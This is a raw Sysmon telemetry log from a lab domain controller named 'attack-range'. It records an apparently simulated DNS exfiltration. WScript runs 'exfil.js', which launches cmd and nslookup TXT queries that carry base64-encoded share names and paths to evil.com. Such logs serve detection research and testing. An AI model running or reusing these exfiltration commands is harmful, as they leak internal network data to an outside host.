14:21:45.168{2E1864BB-18F9-629A-8445-000000005F02}2088C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F9-629A-8245-000000005F02}7792C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmle.tmp 2>&1 10341000x8000000000000000213537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.145{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8345-000000005F02}2792C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.145{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8345-000000005F02}2792C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.129{2E1864BB-18F9-629A-8345-000000005F02}27927856C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-8245-000000005F02}7792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.129{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8345-000000005F02}2792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.114{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.114{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.114{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.114{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.114{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8245-000000005F02}7792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.114{2E1864BB-18E0-629A-6742-000000005F02}39767384C:\Windows\System32\WScript.exe{2E1864BB-18F9-629A-8245-000000005F02}7792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.127{2E1864BB-18F9-629A-8245-000000005F02}7792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmle.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.114{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljmhg.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.794{00000000-0000-0000-0000-000000000000}2764<unknown process>-udpfalsefalse127.0.0.1-51082-false127.0.0.1-53domain 354300x8000000000000000213524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.794{00000000-0000-0000-0000-000000000000}2764<unknown process>-udptruefalse127.0.0.1-51082-false127.0.0.1-53domain 354300x8000000000000000213523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.794{00000000-0000-0000-0000-000000000000}2764<unknown process>-udpfalsefalse127.0.0.1-51081-false127.0.0.1-53domain 354300x8000000000000000213522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.794{00000000-0000-0000-0000-000000000000}2764<unknown process>-udptruefalse127.0.0.1-51081-false127.0.0.1-53domain 354300x8000000000000000213521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.793{00000000-0000-0000-0000-000000000000}2764<unknown process>-udpfalsefalse127.0.0.1-51080-false127.0.0.1-53domain 354300x8000000000000000213520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.793{00000000-0000-0000-0000-000000000000}2764<unknown process>-udptruefalse127.0.0.1-51080-false127.0.0.1-53domain 354300x8000000000000000213519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.720{00000000-0000-0000-0000-000000000000}3712<unknown process>-udpfalsefalse127.0.0.1-51079-false127.0.0.1-53domain 10341000x8000000000000000213518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.077{2E1864BB-18F9-629A-8045-000000005F02}65083992C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-8145-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.077{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.077{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.077{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.077{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.077{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8145-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.077{2E1864BB-18F9-629A-7F45-000000005F02}54845944C:\Windows\system32\cmd.exe{2E1864BB-18F9-629A-8145-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.087{2E1864BB-18F9-629A-8145-000000005F02}6652C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F9-629A-7F45-000000005F02}5484C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljmhg.tmp 2>&1 10341000x8000000000000000213510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.061{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8045-000000005F02}6508C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.061{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8045-000000005F02}6508C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.061{2E1864BB-18F9-629A-8045-000000005F02}65083992C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-7F45-000000005F02}5484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.045{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8045-000000005F02}6508C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.045{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.045{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.045{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.045{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.045{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-7F45-000000005F02}5484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 